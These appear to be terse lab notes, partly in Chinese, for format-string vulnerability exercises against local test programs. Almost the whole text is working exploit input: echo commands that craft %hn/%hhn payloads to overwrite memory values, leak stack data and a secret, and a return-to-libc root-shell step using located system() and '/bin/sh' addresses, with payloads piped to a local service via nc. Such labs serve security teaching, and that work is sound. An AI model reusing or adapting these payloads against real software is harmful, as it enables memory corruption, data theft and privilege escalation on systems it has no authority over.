task1
1.1修改 0x66887799
echo $(printf "\x37\xed\xff\xbf@@@@\x35\xed\xff\xbf@@@@\x36\xed\xff\xbf@@@@\x34\xed\xff\xbf")%.8x%.8x%.8x%.8x%.42x%hhn%.17x%hhn%.17x%hhn%.17x%hhn > input1

./prog1 < input1 |grep address
1.2 修改为deadbeef
echo -e "\x36\xed\xff\xbf@@@@\x35\xed\xff\xbf@@@@\x37\xed\xff\xbf@@@@\x34\xed\xff\xbf%.8x%.8x%.8x%.8x%.113x%hhn%.17x%hhn%.32x%hhn%.17x%hhn" > input2
$ ./prog1 < input

task2
2.1  获得root shell
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7d8e000)
	readelf -a /lib/i386-linux-gnu/libc.so.6 | grep " system"
	  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 --string /bin/sh
============================================================
0x0015b82b : /bin/sh

echo "AAAA|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|" > badfile
echo -e "\xcc\xec\xff\xbf@@@@\xd4\xec\xff\xbf@@@@\xce\xec\xff\xbf@@@@\xd6\xec\xff\xbf%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.19724x%hn%.2699x%hn%.24495x%hn%.18x%hn" > badfile
task3
3.1 打印栈上数据
echo "AAAA|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x" > badfile 

cat badfile | nc 127.0.0.1 9090

3.2 secret值
echo -e "\x40\x87\x04\x08|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%s" > badfile
cat badfile | nc 127.0.0.1 9090

task4
3.3 修改target 0xc0ffee0
echo -e "\x2e\xa0\x04\x08@@@@\x2c\xa0\x04\x08%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.49091x%hn%.11521x%hn" > badfile
cat badfile | nc 127.0.0.1 9090

sudo sysctl -w kernel.randomize_va_space=1
